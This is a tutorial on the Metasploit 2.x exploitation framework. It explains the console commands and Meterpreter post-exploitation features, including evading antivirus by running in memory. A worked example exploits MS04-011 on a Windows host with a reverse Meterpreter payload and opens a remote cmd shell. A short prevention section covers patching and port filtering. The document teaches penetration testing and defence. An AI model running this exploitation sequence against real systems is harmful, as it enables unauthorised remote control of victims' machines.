Metasploit - Exploitation Tool

METASPLOIT

1) Introduction

The Metasploit Framework is an environment for testing, attacking and exploiting services. The 2.x series described here is written in object-oriented Perl, with components in C, assembler and Python (from version 3.0 the framework was rewritten in Ruby). Metasploit runs on most operating systems: Linux, Windows and MacOS. You can download it from www.metasploit.com

From version 2.2 onwards Metasploit can update itself with the msfupdate.bat script in the installation directory.

2) Components of Metasploit

Metasploit supports several user interfaces:

Console interface: msfconsole.bat. msfconsole is driven from the command line, so configuring and testing exploits is faster and more flexible

Web interface: msfweb.bat communicates with the user through a web browser

Command-line interface: msfcli.bat runs one exploit from a single command line, which is convenient for scripting

Environment

Global environment: managed with the setg and unsetg commands; options assigned here are global and apply to all exploit modules.

Temporary environment: managed with the set and unset commands; these options apply only to the currently selected exploit module and do not affect other modules. Where a temporary option and a global option have the same name, the temporary one wins for that module.

You can save the environment you have configured with the save command. It is written to ~/.msf/config and loaded again the next time a user interface starts.

Options common to most exploit modules, such as LPORT, LHOST and PAYLOAD, are best defined in the global environment:

msf > setg LPORT 80

msf > setg LHOST 172.16.8.2

3) Using the Metasploit framework

1. Select the exploit module: choose the program or service flaw that Metasploit supports exploiting

show exploits : list the exploit modules the framework supports

use exploit_name : select the exploit module

info exploit_name : show information about the exploit module

You should update the framework regularly from www.metasploit.com or via the msfupdate.bat script so that new exploit modules are available

2. Configure the selected exploit module

show options : list the options that need to be configured

set : configure an option for that module (set OPTION value)

Some modules also have advanced options, which you can view with show advanced

3. Verify the configuration

check : verifies that the required options are set and, for modules that implement a check routine, tests whether the target is vulnerable without actually launching the exploit

4. Select the target: choose the operating system version the exploit will be tuned for

show targets : list the targets the module provides

set TARGET n : select target number n from that list

e.g.: msf > use windows_ssl_pct

msf > show targets

The exploit lists targets such as winxp, winxp SP1, win2000, win2000 SP1

5. Select the payload

The payload is the code that will run on the remote machine once the exploit succeeds

show payloads : lists the payloads compatible with the current exploit module

info payload_name : show details about that payload

set PAYLOAD payload_name : select the payload by module name. After selecting the payload, run show options again; the payload's own options (for example LHOST and LPORT for a reverse connection) now appear alongside the exploit's

show advanced : show the advanced options of the payload

6. Run the exploit

exploit : launches the exploit and delivers the payload. On success, the payload hands you a session (a shell or Meterpreter) on the exploited system
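
The environment rules of section 2 (setg versus set, temporary overriding global) and the six steps above, written out as a small Python model. This is an added illustration, not Metasploit code; the module, payload and option names (lsass_ms04_011, win32_reverse_meterpreter, RHOST, LHOST, LPORT, PAYLOAD) are the ones this page uses, and the address validation is an extra sanity check of my own that msfconsole itself does not perform in this form.

```python
import ipaddress

# Added illustration of the msfconsole environment rules and exploit
# procedure described on this page; it is not Metasploit code.


class MsfEnvironment:
    """Global options (setg/unsetg) apply to every module; temporary options
    (set/unset) belong to the module selected with `use`, and a temporary
    option overrides a global one of the same name for that module."""

    def __init__(self):
        self.global_env = {}
        self.module_env = {}   # module name -> its temporary environment
        self.current = None

    def setg(self, key, value):
        self.global_env[key] = value

    def unsetg(self, key):
        self.global_env.pop(key, None)

    def use(self, module):
        self.current = module
        self.module_env.setdefault(module, {})

    def set(self, key, value):
        if self.current is None:
            raise RuntimeError("select an exploit with `use` before `set`")
        self.module_env[self.current][key] = value

    def unset(self, key):
        self.module_env.get(self.current, {}).pop(key, None)

    def resolve(self):
        """Effective options for the current module."""
        merged = dict(self.global_env)
        merged.update(self.module_env.get(self.current, {}))
        return merged

    def missing(self, required):
        """Required options that are still unset for the current module."""
        seen = self.resolve()
        return sorted(k for k in required if k not in seen)


def validate_network_options(options):
    """Extra check (my addition): LHOST/RHOST must be IP addresses and
    LPORT a valid TCP port, so typos are caught before `exploit`."""
    problems = []
    for key in ("LHOST", "RHOST"):
        if key in options:
            try:
                ipaddress.ip_address(options[key])
            except ValueError:
                problems.append(f"{key} is not an IP address: {options[key]!r}")
    if "LPORT" in options:
        port = str(options["LPORT"])
        if not (port.isdigit() and 1 <= int(port) <= 65535):
            problems.append(f"LPORT is not a valid port: {port!r}")
    return problems


def build_exploit_session(global_opts, module, module_opts, required):
    """Walk the six steps of section 3 and return (env, command lines).
    Raises ValueError instead of emitting `exploit` when a required option
    is unset or a network option is malformed."""
    env = MsfEnvironment()
    lines = []
    for key, value in global_opts.items():
        env.setg(key, value)
        lines.append(f"setg {key} {value}")
    env.use(module)
    lines.append(f"use {module}")
    for key, value in module_opts.items():      # PAYLOAD, TARGET, RHOST ...
        env.set(key, value)
        lines.append(f"set {key} {value}")
    problems = validate_network_options(env.resolve())
    gaps = env.missing(required)
    if gaps:
        problems.append("unset required options: " + ", ".join(gaps))
    if problems:
        raise ValueError("; ".join(problems))
    lines += ["check", "exploit"]
    return env, lines


if __name__ == "__main__":
    # Values taken from sections 2 and 5 of this page.
    env, lines = build_exploit_session(
        {"LHOST": "192.168.1.1", "LPORT": "80"},
        "lsass_ms04_011",
        {"PAYLOAD": "win32_reverse_meterpreter", "RHOST": "192.168.1.2"},
        ["RHOST", "LHOST", "LPORT", "PAYLOAD"],
    )
    print("\n".join(lines))
```

The point of the model is the scoping rule: after `use` of a second module, RHOST and PAYLOAD set for the first one are gone while the global LHOST and LPORT remain, which is why the page recommends setg for those two.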

4) Introduction to the Meterpreter payload

Meterpreter, short for Meta-Interpreter, is an advanced payload available in the Metasploit framework. Its purpose is to provide post-exploitation functionality on the remote machine. It is written by the developers as shared-object (DLL) files. Meterpreter and its extension modules are loaded and executed in memory rather than written to disk, which makes them harder for antivirus software to detect.

Meterpreter provides extension modules that you can load on the remote computer:

Fs: lets you upload and download files from the remote machine

Net: lets you view remote network information such as IP addresses and the routing table

Process: lets you create new processes on the remote machine

Sys: lets you view system information about the remote machine

Core commands:

use -m module1,module2,module3 [-p path] [-d]

The use command loads Meterpreter extension modules such as Fs, Net, Process and Sys

loadlib -f library [-t target] [-lde]

Loads a library (DLL) into the Meterpreter process on the remote machine

read channel_id [length]

The read command reads data from the remote machine on the given channel

write channel_id

The write command writes data to the remote machine on the given channel

close channel_id

Closes a channel that was opened to the remote computer

interact channel_id

Starts an interactive session on the given channel with the remote machine

initcrypt cipher [parameters]

Enables encryption of the data sent between the host and the remote machine using the given cipher
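
The read/write/close commands above all take a channel id because one Meterpreter connection carries several channels at once (a file transfer, a command shell, a port forward). The following Python is an added, simplified model of that multiplexing, not Meterpreter's code: the frame layout (channel id, command byte, length, payload) is invented for illustration and is not Meterpreter's real wire format. It shows the part that matters in practice, namely that frames can arrive split across reads and must be reassembled before dispatch.

```python
import struct

# Added, simplified model of how several channels share one connection.
# The frame layout here is invented for illustration; it is NOT
# Meterpreter's wire format.

HEADER = struct.Struct("!IBI")          # channel id, command, payload length
CMD_OPEN, CMD_WRITE, CMD_CLOSE = 1, 2, 3


def encode(channel_id, command, payload=b""):
    """Build one frame; the sender's `write channel_id` becomes a CMD_WRITE frame."""
    return HEADER.pack(channel_id, command, len(payload)) + payload


def decode_stream(buf):
    """Split buf into complete frames; return (frames, unparsed tail).
    A frame whose payload has not fully arrived is left in the tail."""
    frames, pos = [], 0
    while len(buf) - pos >= HEADER.size:
        cid, cmd, length = HEADER.unpack_from(buf, pos)
        start = pos + HEADER.size
        if len(buf) - start < length:
            break
        frames.append((cid, cmd, bytes(buf[start:start + length])))
        pos = start + length
    return frames, bytes(buf[pos:])


class ChannelTable:
    """Receiver-side bookkeeping behind read/write/close on channels."""

    def __init__(self):
        self.channels = {}       # channel id -> buffered, not yet read data
        self.pending = b""       # tail of a partial frame from the last feed()
        self.next_id = 1

    def open(self):
        cid, self.next_id = self.next_id, self.next_id + 1
        self.channels[cid] = bytearray()
        return cid

    def _get(self, cid):
        if cid not in self.channels:
            raise KeyError(f"no such channel {cid}")
        return self.channels[cid]

    def write(self, cid, data):
        self._get(cid).extend(data)
        return len(data)

    def read(self, cid, length=None):
        """`read channel_id [length]`: take up to length bytes (all if omitted)."""
        buf = self._get(cid)
        n = len(buf) if length is None else length
        out = bytes(buf[:n])
        del buf[:n]
        return out

    def close(self, cid):
        self._get(cid)
        del self.channels[cid]

    def feed(self, data):
        """Accept raw bytes from the wire, dispatch every complete frame and keep
        any partial frame for the next call. Returns what each frame did."""
        frames, self.pending = decode_stream(self.pending + data)
        results = []
        for cid, cmd, payload in frames:
            if cmd == CMD_OPEN:
                results.append(("open", self.open()))
            elif cmd == CMD_WRITE:
                results.append(("write", self.write(cid, payload)))
            elif cmd == CMD_CLOSE:
                self.close(cid)
                results.append(("close", cid))
            else:
                raise ValueError(f"unknown command {cmd} on channel {cid}")
        return results
```

Because the receiver keeps the unparsed tail between calls, a shell command interleaved with a file chunk on another channel is still delivered to the right buffer even when the network hands the bytes over in arbitrary pieces.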

Using the Fs module: lets you upload and download files from remote machines

cd directory

Same as cd on the command line

getcwd

Shows the current working directory

ls [filter_string]

Lists directories and files

upload src1 [src2 ...] dst

Uploads files to the remote machine

download src1 [src2 ...] dst

Downloads files from the remote machine

Using the Net module:

ipconfig

Shows the network interfaces and IP addresses of the remote machine

route

Shows the routing table of the remote machine

portfwd [-arv] [-L laddr] [-l lport] [-h rhost] [-p rport] [-P]

Creates a port forward between the host and the remote machine: connections to lport on the attacker's side are relayed through the Meterpreter session to rhost:rport, which lets you reach hosts that are only visible from the compromised machine (-a adds a forward, -r removes one, -v lists the active forwards)

Using the Process module:

execute -f file [-a args] [-Hc]

The execute command creates a new process on the remote machine (-H hidden, -c channelized, so its input and output can be reached with read, write and interact)

kill pid1 pid2 pid3

Terminates processes running on the remote machine

ps

Lists the processes of the remote machine

Using the Sys module:

getuid

Shows the user the Meterpreter process is running as on the remote machine

sysinfo

Shows the computer name and operating system

5) Example

The local machine 192.168.1.1 attacks the remote machine 192.168.1.2 through the lsass_ms04_011 vulnerability. This is a stack buffer overflow in the Local Security Authority Subsystem Service (LSASS). lsass.exe is the Windows system process responsible for local security authentication, Active Directory operations on domain controllers, and logon policy; it handles authentication on both clients and servers and runs as SYSTEM, which is why a successful exploit yields full control of the machine.

msf > use lsass_ms04_011

msf > set PAYLOAD win32_reverse_meterpreter

msf > set RHOST 192.168.1.2

msf > set LHOST 192.168.1.1

msf > exploit

meterpreter> help // list the commands the Meterpreter core supports

meterpreter> use -m Process // load the Process extension

meterpreter> help // the Process commands (ps, kill, execute) are now listed as well

meterpreter> ps // list the processes running on the remote machine

meterpreter> kill pid // terminate a process on the remote machine (pid taken from ps)

meterpreter> execute -f cmd -c // start cmd.exe on the remote machine with its input and output attached to a channel (-c)

execute: success, process id is 3516.

execute: allocated channel 1 for new process.

meterpreter> interact 1

interact: Switching to interactive console on 1...

interact: Started interactive channel 1.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS> echo Meterpreter interactive channel in action

echo Meterpreter interactive channel in action

Meterpreter interactive channel in action

C:\WINDOWS> ipconfig

Caught Ctrl-C, close interactive session? [y/N] y

meterpreter>

6) Prevention

Apply Microsoft's patches promptly. For example, to keep Metasploit's lsass_ms04_011 module from succeeding you must install the Microsoft patch. According to Microsoft this is a critical vulnerability present in almost all Windows versions of the time; install hotfix KB835732 to fix it. Do not rely on patching alone: LSASS is reached over the network through SMB/RPC (TCP 139 and 445), so those ports should be filtered from untrusted networks as well.

http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
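
One way to confirm the patch is actually installed on a fleet of XP/2003 hosts is to collect `systeminfo` output and look for the KB number. The Python below is an added example, not from the original article: the `systeminfo` excerpt is constructed for illustration (not captured from a real host), and the hotfix list in REQUIRED_HOTFIXES contains only the MS04-011 patch named on this page. On supported Windows versions the same question is answered directly by PowerShell's `Get-HotFix -Id KB835732`.

```python
import re

# Added example: check a systeminfo dump for the MS04-011 hotfix.

# Hotfixes that close the vulnerability used in the example above (MS04-011 = KB835732).
REQUIRED_HOTFIXES = {"835732"}

# Constructed sample of the "Hotfix(s)" section that `systeminfo` prints on
# Windows XP/2003; not captured from a real host.
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 1 Build 2600
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB823980 - Update
                           [02]: KB835732 - Update
                           [03]: Q828035
"""

# Hotfix lines look like "[02]: KB835732 - Update"; older ones use a Q prefix.
HOTFIX_RE = re.compile(r"^\s*\[\d+\]:\s*(?:KB|Q)(\d+)", re.MULTILINE)


def installed_hotfixes(systeminfo_text):
    """Set of hotfix numbers (without the KB/Q prefix) listed in the dump."""
    return set(HOTFIX_RE.findall(systeminfo_text))


def missing_hotfixes(systeminfo_text, required=REQUIRED_HOTFIXES):
    """Required hotfixes that the dump does not list, sorted for stable output."""
    return sorted(required - installed_hotfixes(systeminfo_text))


if __name__ == "__main__":
    gaps = missing_hotfixes(SAMPLE_SYSTEMINFO)
    print("patched" if not gaps else "missing: " + ", ".join("KB" + g for g in gaps))
```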

Thanks to the network administrators and readers who contributed:
Viking -
(ENS Group) - Adminvietnam ( www.vuevietnam.com/forum ), who collaborated on this article
mail: thanhtung22@gmail.com